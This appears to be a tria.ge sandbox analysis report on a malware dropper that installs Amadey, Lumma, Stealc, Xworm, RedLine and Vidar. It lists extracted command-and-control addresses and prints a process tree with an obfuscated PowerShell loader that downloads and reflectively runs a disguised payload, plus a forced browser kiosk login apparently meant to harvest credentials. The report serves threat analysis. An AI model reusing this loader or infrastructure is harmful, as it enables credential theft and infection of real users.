Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09/03/2025, 02:41

General

  • Target

    c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe

  • Size

    1.9MB

  • MD5

    5b1dbccb1977e33fae7e0efa78e96b49

  • SHA1

    fd97d5e5080b0130e21f998ed33b47997dd87d84

  • SHA256

    c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77

  • SHA512

    62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8

  • SSDEEP

    49152:GbH3jNl9hAMO18bTKiyyGqxcyO1iQwLoFha7:GbHB72buXmA0iVLoFC

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://defaulemot.run/api

https://begindecafer.world/api

https://.garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://j8arisechairedd.shop/api

https://garagedrootz.top/api

https://gmodelshiverd.icu/api

https://biochextryhub.bet/api

https://q8explorebieology.run/api

https://gadgethgfub.icu/api

https://moderzysics.top/api

https://5ktechmindzs.live/api

https://6codxefusion.top/api

https://7phygcsforum.life/api

https://techspherxe.top/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

  • pastebin_url

    https://pastebin.com/raw/H3wFXmEi

Extracted

Family

redline

Botnet

Build 7

C2

101.99.92.190:40919

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 6 IoCs
  • Detect Xworm Payload 3 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 5 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 14 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 20 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 35 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Drops file in Windows directory 11 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 52 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:1208
    • C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
      "C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2960
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe
          "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:584
          • C:\Users\Admin\AppData\Local\Temp\mic107A.tmp.exe
            C:\Users\Admin\AppData\Local\Temp\mic107A.tmp.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1604
          • C:\Windows\system32\cmd.exe
            cmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
            5⤵
              PID:2980
          • C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe
            "C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:1996
            • C:\Windows\system32\cmd.exe
              cmd.exe /c 67cc62a429f2f.vbs
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1796
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1516
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2944
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1972
          • C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe
            "C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2600
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win7-x64&apphost_version=6.0.16&gui=true
              5⤵
              • System Time Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1876
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1876 CREDAT:275457 /prefetch:2
                6⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:900
          • C:\Users\Admin\AppData\Local\Temp\10148390101\6757fa68cc.exe
            "C:\Users\Admin\AppData\Local\Temp\10148390101\6757fa68cc.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2164
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2164 -s 1204
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:1608
          • C:\Users\Admin\AppData\Local\Temp\10148400101\84a6344dd6.exe
            "C:\Users\Admin\AppData\Local\Temp\10148400101\84a6344dd6.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:988
          • C:\Users\Admin\AppData\Local\Temp\10148410101\c4e478285d.exe
            "C:\Users\Admin\AppData\Local\Temp\10148410101\c4e478285d.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3060
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2496
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1664
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1364
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2920
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2288
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              5⤵
                PID:2072
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  6⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1788
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.0.235563576\183715827" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1228 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0f67e03-a0be-407a-bda5-d30d3c976bf9} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1324 100d7458 gpu
                    7⤵
                      PID:2444
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.1.284644514\43948292" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1516 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7e9d282-59c0-45e5-adcc-5fa2297e167b} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1544 41eee58 socket
                      7⤵
                        PID:948
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.2.761947099\1186747694" -childID 1 -isForBrowser -prefsHandle 2024 -prefMapHandle 2020 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54f4046b-ec6c-4ccd-ab71-0e23fa801969} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2036 1005f358 tab
                        7⤵
                          PID:388
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.3.1148181636\1392704372" -childID 2 -isForBrowser -prefsHandle 2984 -prefMapHandle 2980 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66a9c4d8-c857-46e0-b161-1ec4aa3d49f0} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2996 1d2a5758 tab
                          7⤵
                            PID:2724
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.4.1493679881\420308538" -childID 3 -isForBrowser -prefsHandle 3788 -prefMapHandle 3784 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d39f4fcf-9d13-46a7-ad00-95c28aa1e5d6} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3768 1f662558 tab
                            7⤵
                              PID:1056
                            • C:\Program Files\Mozilla Firefox\firefox.exe
